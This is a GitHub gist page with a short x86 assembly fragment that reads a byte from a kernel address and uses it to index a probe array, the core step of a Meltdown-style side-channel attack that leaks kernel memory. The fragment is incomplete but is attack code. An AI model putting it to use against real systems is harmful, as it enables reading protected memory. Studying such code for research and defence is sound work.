Skip to content

Instantly share code, notes, and snippets.

@brn
Created January 4, 2018 07:41
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
Star You must be signed in to star a gist
Save brn/4ad97b3858f184ca74efbbfe54e845ef to your computer and use it in GitHub Desktop.
; rcx = kernel address
; rbx = probe array
retry:
mov al, byte [rcx]
shl rax, 0xc
jz retry
mov rbx, qword [rbx + rax]
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment